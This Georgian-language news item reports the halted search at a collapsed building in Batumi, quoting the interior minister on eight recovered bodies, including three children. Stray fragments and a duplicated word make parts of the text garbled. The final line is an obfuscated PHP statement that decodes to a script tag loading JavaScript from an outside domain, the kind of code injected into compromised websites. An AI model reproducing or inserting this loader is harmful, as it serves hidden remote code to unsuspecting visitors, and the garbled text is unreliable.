celsiusi
ავერსი შნაიდერი
შს მინისტრის, ვახტანგ გომელაურის თქმით, ბათუმში ჩამონგრეული კორპუსის ადგილზე სამძებრო სამუშაოები ჩერდება.
 
მაშველები აქ თითქმის 30 საათია, რაც მუშაობდნენ. ნანგრევებიდან სულ ამოასვენეს 8 ცხედარი, მათგან 3 ბავშვია. ერთი ადამიანი, ახალგაზრდა ქალი კი კლინიკაში გარდაიცვალა დღეს დილას.
 
„ჩვენი ვარაუდით არც ერთი დაკარგული [ადგილზე] აღარ არის და სამძებრო სამუშაოები ჩერდება. იქიდან გამომდინარე, რომ მშენებლები ვარაუდობენ, რომ საფრთხეა და შესაძლოა მოხდეს რაღაც ნაწილის ჩამოშლა… ხედავთ რომ ე.წ. სინკარები, ბეტონებია გადმოწეული და სანამ არ მოხდება მშენებელთა შეკრებაშეკრება..  ისინი იმსჯელებენ, რა და როგორ უნდა მოხდეს. დაექვემდებარება დემონტაჟსა თუ გამაგრებას,“ – ამბობს გომელაური.
 
მისივე თქმით, გარდაცვლილი ბავშვები შვიდი, თორმეტისა და წლისა და სამი თვის იყვნენ.
1235
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");